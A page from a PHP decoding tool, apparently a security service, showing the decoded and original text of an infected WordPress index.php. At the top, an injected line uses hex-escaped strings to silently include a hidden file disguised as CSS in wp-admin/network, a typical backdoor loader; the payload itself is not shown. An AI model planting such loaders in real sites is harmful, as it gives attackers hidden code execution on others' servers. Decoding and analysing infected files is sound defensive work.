Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /*e983c*/ $rksp58 = "/home1/mazevooc/pub\x6cic_htm\x6c/new/wp\x2dadmin/network/...
Decoded Output download
<?php
/*e983c*/
$rksp58 = "/home1/mazevooc/public_html/new/wp-admin/network/.a045c4f8.css"; if (empty($rksp58)) {print ($rksp58);} else { @include_once /* 150 */ ($rksp58); }
/*e983c*/
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
?>
Did this file decode correctly?
Original Code
<?php
/*e983c*/
$rksp58 = "/home1/mazevooc/pub\x6cic_htm\x6c/new/wp\x2dadmin/network/.a045c4f8.css"; if (empty($rksp58)) {print ($rksp58);} else { @include_once /* 150 */ ($rksp58); }
/*e983c*/
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
Function Calls
None |
Stats
MD5 | 5a71c9b10764ca0d14ee9e5f3d1510fd |
Eval Count | 0 |
Decode Time | 48 ms |